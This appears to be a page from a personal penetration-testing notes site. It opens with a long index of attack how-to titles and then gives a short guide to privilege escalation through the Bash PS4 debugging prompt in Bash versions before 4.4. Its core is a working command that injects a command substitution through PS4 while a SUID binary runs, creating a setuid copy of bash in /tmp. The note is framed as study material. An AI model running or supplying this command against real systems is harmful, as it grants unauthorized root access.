Cardboard Iguana Security

journals

spells

Abusing wildcard expansion in Bash

Access the Windows Registry using PowerShell

Add Windows users at the command line

AS-REP roasting with Impacket

AS-REP roasting With Rubeus

AS-REP roasting

Automate Netlify builds with IFTTT

Automatically stabilize a reverse shell with socat

Avoid dropping privileges with SUID Bash

Backdoor Visual Basic Scripts

Bash reverse shell

Bulk edit Windows permissions

Bypass the PowerShell execution policy

Bypass Windows antivirus with C Sharp

Calculate a file hash on Windows with CertUtil

Call Mimikatz from a meterpreter shell

Change a branch name in Git

Change an RSA key passphrase with OpenSSL

Common Windows user types

Compact VM disk images

Confirm the existence of a Gmail address

Create a GPG key with SSH support

Create a zip bomb

Day One to Obsidian conversion script

Debugging Bash scripts

Default CIFS shares

Easy reverse DNS lookups

Enumerate AD CS templates with CertUtil

Equivalent Windows and UNIX commands

Exploit LD_LIBRARY_PATH

Exploit LD_PRELOAD

Exploit local Windows services

Exploit local Windows tasks

Exploit remote Windows services

Exploit remote Windows tasks

Exploit the Bash PS4 prompt

Exploit the Windows DLL search order

Exploit the Windows FoDHelper

Exploit the WinLogon initialization sequence

Exploit VBA scripts with msfvenom

Exploit weak etc-passwd permissions

Exploit weak etc-shadow permissions

Exploit Windows file associations

Exploit Windows HTML applications with msfvenom

Exploit Windows services

Exploit Windows shortcut files

Exploit Windows tasks

Export highlights and annotations from Kobo eReaders

Extract the webpage title from a URL

Find and replace a single line in a large text file

Find executables with SUID capabilities

Fix EXIF data on Google Photos exports

Gemini compatible markdown

Get a shell from ViM

Get an SSL certificate

Golden and silver ticket attacks

HTML applications

IIS configuration data

Invoke-Mimikatz

Invoke-WebRequest

John the Ripper

JSON Web Tokens

Kerberoasting with Impacket

Kerberoasting with Rubeus

Load a shell with a simple executable

Local file inclusion attacks

Look up unicode symbols and emojis

Match files to packages in Debian-based operating systems

Match files to packages in Red Hat-based operating systems

Metasploit MS SQL modules

MITRE ATTaCK emulation plans

Oracle SQL Server

PHP local file inclusion attacks

Poison null byte attack

Poison null byte in PHP

Pop a SYSTEM shell on the Windows login screen using sticky keys

Pop a SYSTEM shell on the Windows login screen using Utilman

Port scanning with Bash

POSIX process signals

PowerShell reverse shell

Pull SSL certificates from an external server

Quick-n-dirty Python web server

Quickly bypass ssh-agent

Quickly find the canonical path of a file

RCE via XXE in PHP

Read a file beginning with a dash

RegEx metacharacters

Remotely install a Windows package with PowerShell

Remove duplicate lines in Bash

Retrieve AIX fileset information

Retrieve AIX system information

Run a remote Windows command using PowerShell

Run commands directly with PowerShell

Send a command using OpenSSL

Set the PATH in a session on UNIX-like operating systems

Set the PATH in a session on Windows

Set up WMI in PowerShell

Shell stabilization

SQL injection attacks

TCP header flags

TCP window size

Transfer files over FTP using netcat

Uniform resource locators

UNIX file descriptors

UNIX password hashes

UNIX permissions

Unquoted path handling in Windows

Upgrade PostgreSQL

Use a Raspberry Pi 4B as hacking accessory

Use an alternate SSH key with Git

Use Bash functions to backdoor executables

Use Burp Suite with Firefox

Use Burp Suite with mobile apps

Use curl and jq with web APIs

Use OpenSSL to encrypt and decrypt files

Use the Windows Firewall to relay ports

Use unsupported display resolutions with Samsung DeX

Use WinRM with PowerShell

Useful built-in commands for Linux reconnaissance

Useful built-in commands for Windows reconnaissance

Useful Linux reconnaissance scripts

Useful scripts for Windows reconnaissance

Visual Basic for Applications

Windows DLL search order

Windows event IDs

Windows event logs

Windows local service accounts

Windows logon scripts

Windows permissions

Windows reconnaissance with PowerShell

Windows Remote Management

Windows Run and RunOnce Registry keys

Windows Scripting Host

Windows SeBackup and SeRestore permissions

Windows SeImpersonate and SeAssignPrimaryToken permissions

Windows service ACLs

Windows services

Windows SeTakeOwnership permission

Windows Startup folder

Windows unattended installation data

Work with base64 encoding using PowerShell

Work with remote services using WMI and PowerShell

Work with remote tasks using WMI and PowerShell

Working with services in PowerShell

Cardboard Iguana Security

title: How to exploit the Bash PS4 (debugging) prompt
aliases:
  - How to exploit the Bash PS4 (debugging) prompt
permalink: spells/exploit-the-bash-ps4-prompt
tags:
  - Language/Bash
  - AttackCycle/PrivEsc
  - HowTo

How to exploit the Bash PS4 (debugging) prompt

Warning

This only works on versions of Bash before v4.4!

When Bash is in debugging mode (SHELLOPTS=xtrace), the $PS4 prompt is used to display debugging information.

It would appear that this prompt somehow inherits the permissions of the executable being run. This includes SUID/SGID permissions (at least for Bash < 4.4)!

If you have access to a SUID/SGID executable, this can be abused to create root shells:

env -i \
SHELLOPTS=xtrace \
PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' \
/path/to/suid/executable

Again, this only works if the calling application is relying on the current shell for helper execution.

Exploit the Bash PS4 prompt

Interactive graph

On this page

How to exploit the Bash PS4 (debugging) prompt